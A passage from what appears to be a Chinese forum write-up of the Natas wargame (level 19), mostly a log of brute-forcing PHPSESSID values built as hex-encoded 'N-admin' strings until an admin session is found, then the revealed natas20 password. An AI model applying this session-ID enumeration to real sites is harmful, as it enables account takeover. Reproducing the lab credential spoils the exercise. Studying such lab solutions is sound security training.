  34. [+] PHPSESSID= 33322d61646d696e...: 33322d61646d696e
  35. [+] PHPSESSID= 33332d61646d696e...: 33332d61646d696e
  36. [+] PHPSESSID= 33342d61646d696e...: 33342d61646d696e
  37. [+] PHPSESSID= 33352d61646d696e...: 33352d61646d696e
  38. [+] PHPSESSID= 33362d61646d696e...: 33362d61646d696e
  39. [+] PHPSESSID= 33372d61646d696e...: 33372d61646d696e
  40. [+] PHPSESSID= 33382d61646d696e...: 33382d61646d696e
  41. [+] PHPSESSID= 33392d61646d696e...: 33392d61646d696e
  42. [+] PHPSESSID= 34302d61646d696e...: 34302d61646d696e
  43. [+] PHPSESSID= 34312d61646d696e...: 34312d61646d696e
  44. [+] PHPSESSID= 34322d61646d696e...: 34322d61646d696e
  45. [+] PHPSESSID= 34332d61646d696e...: 34332d61646d696e
  46. [+] PHPSESSID= 34342d61646d696e...: 34342d61646d696e
  47. [+] PHPSESSID= 34352d61646d696e...: 34352d61646d696e
  48. [+] PHPSESSID= 34362d61646d696e...: 34362d61646d696e
  49. [+] PHPSESSID= 34372d61646d696e...: 34372d61646d696e
  50. [+] PHPSESSID= 34382d61646d696e...: 34382d61646d696e
  51. [+] PHPSESSID= 34392d61646d696e...: 34392d61646d696e
  52. [+] PHPSESSID= 35302d61646d696e...: 35302d61646d696e
  53. [+] PHPSESSID= 35312d61646d696e...: 35312d61646d696e
  54. [+] PHPSESSID= 35322d61646d696e...: 35322d61646d696e
  55. [+] PHPSESSID= 35332d61646d696e...: 35332d61646d696e
  56. [+] PHPSESSID= 35342d61646d696e...: 35342d61646d696e
  57. [+] PHPSESSID= 35352d61646d696e...: 35352d61646d696e
  58. [+] PHPSESSID= 35362d61646d696e...: 35362d61646d696e
  59. [+] PHPSESSID= 35372d61646d696e...: 35372d61646d696e
  60. [+] PHPSESSID= 35382d61646d696e...: 35382d61646d696e
  61. [+] PHPSESSID= 35392d61646d696e...: 35392d61646d696e
  62. [+] PHPSESSID= 36302d61646d696e...: 36302d61646d696e
  63. [+] PHPSESSID= 36312d61646d696e...: 36312d61646d696e
  64. [+] PHPSESSID= 36322d61646d696e...: 36322d61646d696e
  65. [+] PHPSESSID= 36332d61646d696e...: 36332d61646d696e
  66. [+] PHPSESSID= 36342d61646d696e...: 36342d61646d696e
  67. [+] PHPSESSID= 36352d61646d696e...: 36352d61646d696e
  68. [+] PHPSESSID= 36362d61646d696e...: 36362d61646d696e
  69. [+] PHPSESSID= 36372d61646d696e...: 36372d61646d696e
  70. [+] PHPSESSID= 36382d61646d696e...: 36382d61646d696e
  71. [+] PHPSESSID= 36392d61646d696e...: 36392d61646d696e
  72. [+] PHPSESSID= 37302d61646d696e...: 37302d61646d696e
  73. [+] PHPSESSID= 37312d61646d696e...: 37312d61646d696e
  74. [+] PHPSESSID= 37322d61646d696e...: 37322d61646d696e
  75. [+] PHPSESSID= 37332d61646d696e...: 37332d61646d696e
  76. [+] PHPSESSID= 37342d61646d696e...: 37342d61646d696e
  77. [+] PHPSESSID= 37352d61646d696e...: 37352d61646d696e
  78. [+] PHPSESSID= 37362d61646d696e...: 37362d61646d696e
  79. [+] PHPSESSID= 37372d61646d696e...: 37372d61646d696e
  80. [+] PHPSESSID= 37382d61646d696e...: 37382d61646d696e
  81. [+] PHPSESSID= 37392d61646d696e...: 37392d61646d696e
  82. [+] PHPSESSID= 38302d61646d696e...: 38302d61646d696e
  83. [+] PHPSESSID= 38312d61646d696e...: 38312d61646d696e
  84. [+] PHPSESSID= 38322d61646d696e...: 38322d61646d696e
  85. [+] PHPSESSID= 38332d61646d696e...: 38332d61646d696e
  86. [+] PHPSESSID= 38342d61646d696e...: 38342d61646d696e
  87. [+] PHPSESSID= 38352d61646d696e...: 38352d61646d696e
  88. [+] PHPSESSID= 38362d61646d696e...: 38362d61646d696e
  89. [+] PHPSESSID= 38372d61646d696e...: 38372d61646d696e
  90. [+] PHPSESSID= 38382d61646d696e...: 38382d61646d696e
  91. [+] PHPSESSID= 38392d61646d696e...: 38392d61646d696e
  92. [+] PHPSESSID= 39302d61646d696e...: 39302d61646d696e
  93. [+] PHPSESSID= 39312d61646d696e...: 39312d61646d696e
  94. [+] PHPSESSID= 39322d61646d696e...: 39322d61646d696e
  95. [+] PHPSESSID= 39332d61646d696e...: 39332d61646d696e
  96. [+] PHPSESSID= 39342d61646d696e...: 39342d61646d696e
  97. [+] PHPSESSID= 39352d61646d696e...: 39352d61646d696e
  98. [+] PHPSESSID= 39362d61646d696e...: 39362d61646d696e
  99. [+] PHPSESSID= 39372d61646d696e...: 39372d61646d696e
  100. [+] PHPSESSID= 39382d61646d696e...: 39382d61646d696e
  101. [+] PHPSESSID= 39392d61646d696e...: 39392d61646d696e
  102. [+] PHPSESSID= 3130302d61646d696e.: 3130302d61646d696e
  103. [+] PHPSESSID= 3130312d61646d696e.: 3130312d61646d696e
  104. [+] PHPSESSID= 3130322d61646d696e.: 3130322d61646d696e
  105. [+] PHPSESSID= 3130332d61646d696e.: 3130332d61646d696e
  106. [+] PHPSESSID= 3130342d61646d696e.: 3130342d61646d696e
  107. [+] PHPSESSID= 3130352d61646d696e.: 3130352d61646d696e
  108. [+] PHPSESSID= 3130362d61646d696e.: 3130362d61646d696e
  109. [+] PHPSESSID= 3130372d61646d696e.: 3130372d61646d696e
  110. [+] PHPSESSID= 3130382d61646d696e.: 3130382d61646d696e
  111. [+] PHPSESSID= 3130392d61646d696e.: 3130392d61646d696e
  112. [+] PHPSESSID= 3131302d61646d696e.: 3131302d61646d696e
  113. [+] PHPSESSID= 3131312d61646d696e.: 3131312d61646d696e
  114. [+] PHPSESSID= 3131322d61646d696e.: 3131322d61646d696e
  115. [+] PHPSESSID= 3131332d61646d696e.: 3131332d61646d696e
  116. [+] PHPSESSID= 3131342d61646d696e.: 3131342d61646d696e
  117. [+] PHPSESSID= 3131352d61646d696e.: 3131352d61646d696e
  118. [+] PHPSESSID= 3131362d61646d696e.: 3131362d61646d696e
  119. [+] PHPSESSID= 3131372d61646d696e.: 3131372d61646d696e
  120. [+] PHPSESSID= 3131382d61646d696e.: 3131382d61646d696e
  121. [+] PHPSESSID= 3131392d61646d696e.: 3131392d61646d696e
  122. [+] PHPSESSID= 3132302d61646d696e.: 3132302d61646d696e
  123. [+] PHPSESSID= 3132312d61646d696e.: 3132312d61646d696e
  124. [+] PHPSESSID= 3132322d61646d696e.: 3132322d61646d696e
  125. [+] PHPSESSID= 3132332d61646d696e.: 3132332d61646d696e
  126. [+] PHPSESSID= 3132342d61646d696e.: 3132342d61646d696e
  127. [+] PHPSESSID= 3132352d61646d696e.: 3132352d61646d696e
  128. [+] PHPSESSID= 3132362d61646d696e.: 3132362d61646d696e
  129. [+] PHPSESSID= 3132372d61646d696e.: 3132372d61646d696e
  130. [+] PHPSESSID= 3132382d61646d696e.: 3132382d61646d696e
  131. [+] PHPSESSID= 3132392d61646d696e.: 3132392d61646d696e
  132. [+] PHPSESSID= 3133302d61646d696e.: 3133302d61646d696e
  133. [+] PHPSESSID= 3133312d61646d696e.: 3133312d61646d696e
  134. [+] PHPSESSID= 3133322d61646d696e.: 3133322d61646d696e
  135. [+] PHPSESSID= 3133332d61646d696e.: 3133332d61646d696e
  136. [+] PHPSESSID= 3133342d61646d696e.: 3133342d61646d696e
  137. [+] PHPSESSID= 3133352d61646d696e.: 3133352d61646d696e
  138. [+] PHPSESSID= 3133362d61646d696e.: 3133362d61646d696e
  139. [+] PHPSESSID= 3133372d61646d696e.: 3133372d61646d696e
  140. [+] PHPSESSID= 3133382d61646d696e.: 3133382d61646d696e
  141. [+] PHPSESSID= 3133392d61646d696e.: 3133392d61646d696e
  142. [+] PHPSESSID= 3134302d61646d696e.: 3134302d61646d696e
  143. [+] PHPSESSID= 3134312d61646d696e.: 3134312d61646d696e
  144. [+] PHPSESSID= 3134322d61646d696e.: 3134322d61646d696e
  145. [+] PHPSESSID= 3134332d61646d696e.: 3134332d61646d696e
  146. [+] PHPSESSID= 3134342d61646d696e.: 3134342d61646d696e
  147. [+] PHPSESSID= 3134352d61646d696e.: 3134352d61646d696e
  148. [+] PHPSESSID= 3134362d61646d696e.: 3134362d61646d696e
  149. [+] PHPSESSID= 3134372d61646d696e.: 3134372d61646d696e
  150. [+] PHPSESSID= 3134382d61646d696e.: 3134382d61646d696e
  151. [+] PHPSESSID= 3134392d61646d696e.: 3134392d61646d696e
  152. [+] PHPSESSID= 3135302d61646d696e.: 3135302d61646d696e
  153. [+] PHPSESSID= 3135312d61646d696e.: 3135312d61646d696e
  154. [+] PHPSESSID= 3135322d61646d696e.: 3135322d61646d696e
  155. [+] PHPSESSID= 3135332d61646d696e.: 3135332d61646d696e
  156. [+] PHPSESSID= 3135342d61646d696e.: 3135342d61646d696e
  157. [+] PHPSESSID= 3135352d61646d696e.: 3135352d61646d696e
  158. [+] PHPSESSID= 3135362d61646d696e.: 3135362d61646d696e
  159. [+] PHPSESSID= 3135372d61646d696e.: 3135372d61646d696e
  160. [+] PHPSESSID= 3135382d61646d696e.: 3135382d61646d696e
  161. [+] PHPSESSID= 3135392d61646d696e.: 3135392d61646d696e
  162. [+] PHPSESSID= 3136302d61646d696e.: 3136302d61646d696e
  163. [+] PHPSESSID= 3136312d61646d696e.: 3136312d61646d696e
  164. [+] PHPSESSID= 3136322d61646d696e.: 3136322d61646d696e
  165. [+] PHPSESSID= 3136332d61646d696e.: 3136332d61646d696e
  166. [+] PHPSESSID= 3136342d61646d696e.: 3136342d61646d696e
  167. [+] PHPSESSID= 3136352d61646d696e.: 3136352d61646d696e
  168. [+] PHPSESSID= 3136362d61646d696e.: 3136362d61646d696e
  169. [+] PHPSESSID= 3136372d61646d696e.: 3136372d61646d696e
  170. [+] PHPSESSID= 3136382d61646d696e.: 3136382d61646d696e
  171. [+] PHPSESSID= 3136392d61646d696e.: 3136392d61646d696e
  172. [+] PHPSESSID= 3137302d61646d696e.: 3137302d61646d696e
  173. [+] PHPSESSID= 3137312d61646d696e.: 3137312d61646d696e
  174. [+] PHPSESSID= 3137322d61646d696e.: 3137322d61646d696e
  175. [+] PHPSESSID= 3137332d61646d696e.: 3137332d61646d696e
  176. [+] PHPSESSID= 3137342d61646d696e.: 3137342d61646d696e
  177. [+] PHPSESSID= 3137352d61646d696e.: 3137352d61646d696e
  178. [+] PHPSESSID= 3137362d61646d696e.: 3137362d61646d696e
  179. [+] PHPSESSID= 3137372d61646d696e.: 3137372d61646d696e
  180. [+] PHPSESSID= 3137382d61646d696e.: 3137382d61646d696e
  181. [+] PHPSESSID= 3137392d61646d696e.: 3137392d61646d696e
  182. [+] PHPSESSID= 3138302d61646d696e.: 3138302d61646d696e
  183. [+] PHPSESSID= 3138312d61646d696e.: 3138312d61646d696e
  184. [+] PHPSESSID= 3138322d61646d696e.: 3138322d61646d696e
  185. [+] PHPSESSID= 3138332d61646d696e.: 3138332d61646d696e
  186. [+] PHPSESSID= 3138342d61646d696e.: 3138342d61646d696e
  187. [+] PHPSESSID= 3138352d61646d696e.: 3138352d61646d696e
  188. [+] PHPSESSID= 3138362d61646d696e.: 3138362d61646d696e
  189. [+] PHPSESSID= 3138372d61646d696e.: 3138372d61646d696e
  190. [+] PHPSESSID= 3138382d61646d696e.: 3138382d61646d696e
  191. [+] PHPSESSID= 3138392d61646d696e.: 3138392d61646d696e
  192. [+] PHPSESSID= 3139302d61646d696e.: 3139302d61646d696e
  193. [+] PHPSESSID= 3139312d61646d696e.: 3139312d61646d696e
  194. [+] PHPSESSID= 3139322d61646d696e.: 3139322d61646d696e
  195. [+] PHPSESSID= 3139332d61646d696e.: 3139332d61646d696e
  196. [+] PHPSESSID= 3139342d61646d696e.: 3139342d61646d696e
  197. [+] PHPSESSID= 3139352d61646d696e.: 3139352d61646d696e
  198. [+] PHPSESSID= 3139362d61646d696e.: 3139362d61646d696e
  199. [+] PHPSESSID= 3139372d61646d696e.: 3139372d61646d696e
  200. [+] PHPSESSID= 3139382d61646d696e.: 3139382d61646d696e
  201. [+] PHPSESSID= 3139392d61646d696e.: 3139392d61646d696e
  202. [+] PHPSESSID= 3230302d61646d696e.: 3230302d61646d696e
  203. [+] PHPSESSID= 3230312d61646d696e.: 3230312d61646d696e
  204. [+] PHPSESSID= 3230322d61646d696e.: 3230322d61646d696e
  205. [+] PHPSESSID= 3230332d61646d696e.: 3230332d61646d696e
  206. [+] PHPSESSID= 3230342d61646d696e.: 3230342d61646d696e
  207. [+] PHPSESSID= 3230352d61646d696e.: 3230352d61646d696e
  208. [+] PHPSESSID= 3230362d61646d696e.: 3230362d61646d696e
  209. [+] PHPSESSID= 3230372d61646d696e.: 3230372d61646d696e
  210. [+] PHPSESSID= 3230382d61646d696e.: 3230382d61646d696e
  211. [+] PHPSESSID= 3230392d61646d696e.: 3230392d61646d696e
  212. [+] PHPSESSID= 3231302d61646d696e.: 3231302d61646d696e
  213. [+] PHPSESSID= 3231312d61646d696e.: 3231312d61646d696e
  214. [+] PHPSESSID= 3231322d61646d696e.: 3231322d61646d696e
  215. [+] PHPSESSID= 3231332d61646d696e.: 3231332d61646d696e
  216. [+] PHPSESSID= 3231342d61646d696e.: 3231342d61646d696e
  217. [+] PHPSESSID= 3231352d61646d696e.: 3231352d61646d696e
  218. [+] PHPSESSID= 3231362d61646d696e.: 3231362d61646d696e
  219. [+] PHPSESSID= 3231372d61646d696e.: 3231372d61646d696e
  220. [+] PHPSESSID= 3231382d61646d696e.: 3231382d61646d696e
  221. [+] PHPSESSID= 3231392d61646d696e.: 3231392d61646d696e
  222. [+] PHPSESSID= 3232302d61646d696e.: 3232302d61646d696e
  223. [+] PHPSESSID= 3232312d61646d696e.: 3232312d61646d696e
  224. [+] PHPSESSID= 3232322d61646d696e.: 3232322d61646d696e
  225. [+] PHPSESSID= 3232332d61646d696e.: 3232332d61646d696e
  226. [+] PHPSESSID= 3232342d61646d696e.: 3232342d61646d696e
  227. [+] PHPSESSID= 3232352d61646d696e.: 3232352d61646d696e
  228. [+] PHPSESSID= 3232362d61646d696e.: 3232362d61646d696e
  229. [+] PHPSESSID= 3232372d61646d696e.: 3232372d61646d696e
  230. [+] PHPSESSID= 3232382d61646d696e.: 3232382d61646d696e
  231. [+] PHPSESSID= 3232392d61646d696e.: 3232392d61646d696e
  232. [+] PHPSESSID= 3233302d61646d696e.: 3233302d61646d696e
  233. [+] PHPSESSID= 3233312d61646d696e.: 3233312d61646d696e
  234. [+] PHPSESSID= 3233322d61646d696e.: 3233322d61646d696e
  235. [+] PHPSESSID= 3233332d61646d696e.: 3233332d61646d696e
  236. [+] PHPSESSID= 3233342d61646d696e.: 3233342d61646d696e
  237. [+] PHPSESSID= 3233352d61646d696e.: 3233352d61646d696e
  238. [+] PHPSESSID= 3233362d61646d696e.: 3233362d61646d696e
  239. [+] PHPSESSID= 3233372d61646d696e.: 3233372d61646d696e
  240. [+] PHPSESSID= 3233382d61646d696e.: 3233382d61646d696e
  241. [+] PHPSESSID= 3233392d61646d696e.: 3233392d61646d696e
  242. [+] PHPSESSID= 3234302d61646d696e.: 3234302d61646d696e
  243. [+] PHPSESSID= 3234312d61646d696e.: 3234312d61646d696e
  244. [+] PHPSESSID= 3234322d61646d696e.: 3234322d61646d696e
  245. [+] PHPSESSID= 3234332d61646d696e.: 3234332d61646d696e
  246. [+] PHPSESSID= 3234342d61646d696e.: 3234342d61646d696e
  247. [+] PHPSESSID= 3234352d61646d696e.: 3234352d61646d696e
  248. [+] PHPSESSID= 3234362d61646d696e.: 3234362d61646d696e
  249. [+] PHPSESSID= 3234372d61646d696e.: 3234372d61646d696e
  250. [+] PHPSESSID= 3234382d61646d696e.: 3234382d61646d696e
  251. [+] PHPSESSID= 3234392d61646d696e.: 3234392d61646d696e
  252. [+] PHPSESSID= 3235302d61646d696e.: 3235302d61646d696e
  253. [+] PHPSESSID= 3235312d61646d696e.: 3235312d61646d696e
  254. [+] PHPSESSID= 3235322d61646d696e.: 3235322d61646d696e
  255. [+] PHPSESSID= 3235332d61646d696e.: 3235332d61646d696e
  256. [+] PHPSESSID= 3235342d61646d696e.: 3235342d61646d696e
  257. [+] PHPSESSID= 3235352d61646d696e.: 3235352d61646d696e
  258. [+] PHPSESSID= 3235362d61646d696e.: 3235362d61646d696e
  259. [+] PHPSESSID= 3235372d61646d696e.: 3235372d61646d696e
  260. [+] PHPSESSID= 3235382d61646d696e.: 3235382d61646d696e
  261. [+] PHPSESSID= 3235392d61646d696e.: 3235392d61646d696e
  262. [+] PHPSESSID= 3236302d61646d696e.: 3236302d61646d696e
  263. [+] PHPSESSID= 3236312d61646d696e.: 3236312d61646d696e
  264. [+] PHPSESSID= 3236322d61646d696e.: 3236322d61646d696e
  265. [+] PHPSESSID= 3236332d61646d696e.: 3236332d61646d696e
  266. [+] PHPSESSID= 3236342d61646d696e.: 3236342d61646d696e
  267. [+] PHPSESSID= 3236352d61646d696e.: 3236352d61646d696e
  268. [+] PHPSESSID= 3236362d61646d696e.: 3236362d61646d696e
  269. [+] PHPSESSID= 3236372d61646d696e.: 3236372d61646d696e
  270. [+] PHPSESSID= 3236382d61646d696e.: 3236382d61646d696e
  271. [+] PHPSESSID= 3236392d61646d696e.: 3236392d61646d696e
  272. [+] PHPSESSID= 3237302d61646d696e.: 3237302d61646d696e
  273. [+] PHPSESSID= 3237312d61646d696e.: 3237312d61646d696e
  274. [+] PHPSESSID= 3237322d61646d696e.: 3237322d61646d696e
  275. [+] PHPSESSID= 3237332d61646d696e.: 3237332d61646d696e
  276. [+] PHPSESSID= 3237342d61646d696e.: 3237342d61646d696e
  277. [+] PHPSESSID= 3237352d61646d696e.: 3237352d61646d696e
  278. [+] PHPSESSID= 3237362d61646d696e.: 3237362d61646d696e
  279. [+] PHPSESSID= 3237372d61646d696e.: 3237372d61646d696e
  280. [+] PHPSESSID= 3237382d61646d696e.: 3237382d61646d696e
  281. [+] PHPSESSID= 3237392d61646d696e.: 3237392d61646d696e
  282. [+] PHPSESSID= 3238302d61646d696e.: 3238302d61646d696e
  283. The PHPSESSID with correct password is: 3238312d61646d696e
复制代码
提交正确的种子之后,看到
This page uses mostly the same code as the previous level, but session IDs are no longer sequential...
You are an admin. The credentials for the next level are:
Username: natas20
Password: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw
natas20

审计代码
[code]
您需要登录后才可以回帖 登录 | 立即注册